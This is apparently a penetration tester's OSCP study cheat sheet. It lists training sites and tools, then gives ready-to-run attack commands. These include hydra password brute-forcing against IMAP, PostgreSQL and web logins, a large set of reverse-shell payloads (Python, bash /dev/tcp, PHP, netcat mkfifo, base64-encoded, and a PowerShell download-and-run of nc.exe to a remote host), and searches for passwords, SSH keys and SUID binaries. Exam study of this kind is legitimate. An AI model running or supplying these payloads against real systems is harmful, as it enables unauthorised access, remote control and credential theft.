offical exam guide
offical exam report
pentest.ws: note taking
Burp Suite: tool for exploring web security. Configure browser with Burp Suite
OWASP juice box: OWASP security trainings
[hack this site]
[over the wire]
[pwnable.kr/xyz]
[hack the box]
[cybrary]
[google gruyeye]
[game of hacks]
[bWAPP]
[Webgoat]
hashcat: password recovery tool rule_based_attack
feroxbuster: powerful forced browsing tool (gobusterγdirb)
AutoRecon: multi-threaded network reconnaissance tool which performs automated enumeration of services
explainshell: explain command-line
SecLists: It's a collection of multiple types of lists used during security assessments, collected in one place
Reverse Shell Generator: online reverse shell generator
hacktricks
CyberChef: a web app for encryption, encoding, compression and data analysis.
Microsoft Security Response Center
exploit-notes.hdks.org
cvexploits.io: CVExploits Search
portswigger.net/web-security: Learn various web security techniques.
offsec.tools: A vast collection of security tools for bug bounty, pentest and red teaming.
LOLBAS: Living Off The Land Binaries, Scripts and Libraries
CAPEC: Common Attack Pattern Enumerations and Classifications
Burp Suite: Burp Suite Certified Practitioner Exam Study
BloodyAD: An Active Directory Privilege Escalation Framework
NetExec: The Network Execution Tool (CrackMapExec)
MITRE ATT&CK: ATT&CK Matrix for Enterprise
jadx: Dex to Java decompiler
nuclei: Community Powered Vulnerability Scanner, nuclei templates
Tilix: Tilix is a terminal emulator for Linux systems. It provides features such as support for split terminals, custom layouts, and a Quake-style drop-down mode.
API Penetration Testing: Mindmaps, tips & tricks, resources
Assetnote Wordlists
HackingHub: A new platform is established to offer guidance on enhancing hacking skills in real-world scenarios.
linPEAS: Understanding the tools/scripts you use in a Pentest
Official Exam Guide
2022 Official OSCP Prep Guide
2022/1/11 Active Directory
2022/8/6 OSCP Bonus Points Update
2023/3/15 PEN-200 (PWK): Updated for 2023
- FAQ
- The OSCP exam is not changing as part of the update, with the exception of the removal of the independent
Buffer Overflow
machine from the exam. After the new material has been available for six months, any content included in the new version of PWK will be eligible for inclusion on the exam.
Make sure there are no maximum number of login attempts. To perform a manual check.
IMAP
hydra -L <usernameList> -P <passwordList> -s 143 -f <target ip> imap
# -f exit when a login/pass pair is found
# -s target port
PostgreSQL
hydra -l <username> -P <passwordList> <target ip> postgres
for normal connection
psql -U <username> -p 5432 -h <hostname or ip>
HTTP Basic Authentication
hydra -l admin -P <passwordList> -s 80 -f <target ip> http-get /
# (/):default
JSON
# Content-TypeγAcceptγOriginγX-Requested-WithγReferer and CSRF checksγCookies
# use cURL to check necessary headers
hydra -l admin -P <passwordList> <target ip> https-post-form "/login:{\"username\"\:\"^USER^\",\"password\"\:\"^PASS^\"}:F=401:H=Origin\: https\://test.com:H=Accept\: application/json, text/plain, */*:H=Content-Type\: application/json;charset=utf-8"
get a list for password crackers
cewl -d 4 https://192.168.0.1 -w /tmp/wordlists.txt --with-numbers --lowercase
# -d depth
# --with-numbers: Accept words with numbers in as well as just letters
# --help
scan a subnet
# Note that if set too fast may affect the results
nmap -T3 192.168.10.0/24
scan all TCP ports and services
nmap -Pn -p- -sC -sV -T4 <target ip>
optimizing performance
nmap -p- --min-rate 1000 <target ip>
# --min-rate <number>: Send packets no slower than <number> per second
# and then specific port
nmap -p <target port> -sC -sV <target ip>
# UDP
nmap -p- --min-rate 1000 -sU <target ip>
ncat
ncat -e /bin/bash <attacker ip> <attacker port>
python3(file)
#!/usr/bin/python3
from os import dup2
from subprocess import run
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("<attacker ip>",<attacker port>))
dup2(s.fileno(),0)
dup2(s.fileno(),1)
dup2(s.fileno(),2)
run(["/bin/bash","-i"])
python(file)
#!/usr/bin/env python
import os
import sys
try:
os.system("python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"<attacker ip>\",<attacker port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")\'")
except:
print 'ERROR...'
sys.exit(0)
When using the exploit file to pass command parameters fails
python
command = "echo '/bin/bash -i >& /dev/tcp/<attacker ip>/<attacker port> 0>&1' > /tmp/revshell.sh && chmod 777 /tmp/revshell.sh && /bin/bash /tmp/revshell.sh"
java
String[] cmdline = { "sh", "-c", "echo 'bash -i >& /dev/tcp/<attacker ip>/<attacker port> 0>&1' > /tmp/revshell.sh && chmod 777 /tmp/revshell.sh && bash /tmp/revshell.sh" };
Runtime.getRuntime().exec(cmdline);
php(file)
<?php system(\"nc -e /bin/bash <attacker ip> <attacker port>\"); ?>
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/<attacker ip>/<attacker port> 0>&1'");?>
special cases 1
rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attacker ip> <attacker port> >/tmp/f
special cases 2
# rev.sh
# sh -i >& /dev/tcp/<attacker ip>/<attacker port> 0>&1
curl http://<attacker ip>/rev.sh -o /tmp/rev.sh
bash /tmp/rev.sh
base64
echo 'bash -c "bash -i >& /dev/tcp/<attacker ip>/<attacker port> 0>&1"' | base64
echo -n <base64 command string> | base64 -d | bash
# echo -n cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoIjEyNy4wLjAuMSIsODApKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTtvcy5kdXAyKHMuZmlsZW5vKCksMik7aW1wb3J0IHB0eTsgcHR5LnNwYXduKCJzaCIpJw== | base64 -d | bash
Windows cmd
REM https://www.revshells.com/ Powershell#3(Base64)
PowerShell.exe -command "powershell -e <base64 command string>"
crontab -l
ls -alh /etc/cron.* /etc/at*
cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/root 2>/dev/null | grep -v "^#"
unprivileged Linux process snooping: pspy
Finding application
wpscan --url http://192.168.0.1/ --random-user-agent
Enumerating valid usernames
wpscan --url http://192.168.0.1/ --enumerate u1-1000 --random-user-agent
Enumerating themes
wpscan --url http://192.168.0.1/ -e at --random-user-agent
curl -k -s http://192.168.0.1/wp-content/themes/ | html2text
curl -s -X GET http://192.168.0.1 | grep -E 'wp-content/themes' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
Enumerating plugins
wpscan --url http://192.168.0.1/ -e ap --random-user-agent
wpscan --url http://192.168.0.1/ -e ap --plugins-detection aggressive --api-token <api_key> -t 20 --verbose --random-user-agent
# --api-token:display vulnerability data (not always necessary), register a uesr and get the api key from wpscan offical website
curl -k -s http://192.168.0.1/wp-content/plugins/ | html2text
curl -s -X GET http://192.168.0.1 | grep -E 'wp-content/plugins/' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
Brute-force attack
wpscan --url http://192.168.0.1/ --passwords /usr/share/wordlists/rockyou.txt --max-threads 50 --usernames admin --random-user-agent
SSL peer certificate or SSH remote key was not valid
wpscan --url https://192.168.0.1/ --disable-tls-checks --random-user-agent
π LFI
file in Windows
C:\Windows\System32\drivers\etc\hosts
git clone https://github.com/Tib3rius/AutoRecon.git
cd AutoRecon
sudo python3 autorecon.py <target IP> --dirbuster.wordlist "" # skip directory busting to speed up results
find subdomains
wfuzz -H 'Host: FUZZ.test.com' -u http://test.com -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --hw 407
# hw:hide responses words
need to authenticate
# php example
wfuzz -H 'Cookie: PHPSESSID=<fill in the PHPSESSID>' -u https://<target ip>/<folder>/?FUZZ= -w <wordlist> --hw <value>
post requests
wfuzz -z file,<wordlist> -d "username=admin&password=FUZZ" --hc 302 <url>
# -d postdata
# -z file,wordlist
# hc:hide responses code
create new password list
echo -n "passwordstring" > /tmp/oldPass
# -n: do not output the trailing newline
hashcat -r /usr/share/hashcat/rules/best64.rule --stdout /tmp/oldPass > /tmp/newPassList.txt
MD5
REM Try using m=0
.\hashcat.exe -a 0 -m 0 .\hash .\rockyou.txt
Typical site folders
/srv/http/
/var/www/html/
avoid permission denied messages
find / -name *kali* 2>&-
find / -writable -type f 2>/dev/null | grep -v "/proc/"
find files containing specific text
find / -type f \( -iname \*.php -o -iname \*.config -o -iname \*.conf -o -iname \*.ini -o -iname \*.txt \) -exec grep -i 'password\|passwd' {} \; -print 2>&-
grep -arin -o -E '(\w+\W+){0,5}password(\W+\w+){0,5}' .
# -a: Treat binary files as text files.
# -r: Recursively search subdirectories.
# -i: Perform a case-insensitive search.
# -n: Display line numbers along with the matched lines.
# -o: Only display the part of the line that matches the pattern.
# -E: Interpret the pattern as an extended regular expression.
# '(\w+\W+){0,5}password(\W+\w+){0,5}'
# (\w+\W+){0,5}: This part matches zero to five occurrences of a word character followed by a non-word character (basically, any characters) before the actual word "password."
# (\W+\w+){0,5}: This part matches zero to five occurrences of a non-word character followed by a word character after the word "password."
finding SUID executables
find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;
find / -uid 0 -perm -4000 -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
find ssh key
find / -type f -name id_rsa* 2>&-
group capabilities
id
uid=1000(kali) gid=1000(kali) groups=1000(kali),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),109(netdev),119(wireshark),122(bluetooth),134(scanner),143(kaboxer)
find / -group <name> 2>/dev/null
# find / -group wireshark 2>/dev/null
locate and execute the file
find / -name "*.log" 2>/dev/null -exec cat {} \;
upgrade reverse shell in Kali
# 1.switch to bash
bash
nc -nlvp <local port>
# 2
/usr/bin/script -qc /bin/bash /dev/null
# 3
script -c "/bin/bash -i" /dev/null
# chsh - change your login shell
chsh /bin/bash
# full pathnames of valid login shells
cat /etc/shells
# 1.finding current shell
echo $0
# 2.finding current shell
/proc/self/exe --version
icacls: Performs the operation on all specified files in the current directory and its subdirectories.
icacls <directory> /t
Remarks
A sequence of simple rights:
F - Full access
M - Modify access
RX - Read and execute access
R - Read-only access
W - Write-only access
download file
certutil -f -urlcache <URL> <local filename>
powershell -Command "Invoke-WebRequest '<URL>' -OutFile <filename>"
powershell -Command "Invoke-WebRequest \"<URL>\" -OutFile <filename>"
get file hash
certutil -hashfile <file> MD5
find files containing specific text
findstr /si password C:\*.xml C:\*.ini C:\*.txt C:\*.config C:\*.conf
bypass
C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe -ep bypass C:\Windows\Temp\xxx.ps1
zip
Compress-Archive -Path C:\Users\guest\Desktop\dist -DestinationPath C:\Users\guest\Desktop\dist
unzip
Expand-Archive -LiteralPath C:\Users\guest\Desktop\dist.zip -DestinationPath C:\Users\guest\Desktop
reverse shell
powershell -c "IEX(New-Object System.Net.WebClient).DownloadFile('http://192.168.0.100/nc.exe', 'C:\users\XXX\desktop\nc.exe');C:\users\XXX\desktop\nc.exe 192.168.0.100 80 -e cmd"
find specific files
Get-ChildItem -Path "C:\Folder" -Recurse -Force -Filter "*.txt"
Get-ChildItem -Path "C:\Folder" -Recurse -Force -Include "*.txt","*.zip","*.conf"
disable search in address bar function, easier to test
type in searchBar "about:config"
Accept warning
Search "keyword.enabled" and change it to false
modify header tool (or Burp Suite)
https://addons.mozilla.org/en-US/firefox/addon/simple-modify-header/
C:\Windows\SysWOW64
C:\Windows\System32
C:\Windows\System32\drivers\etc\hosts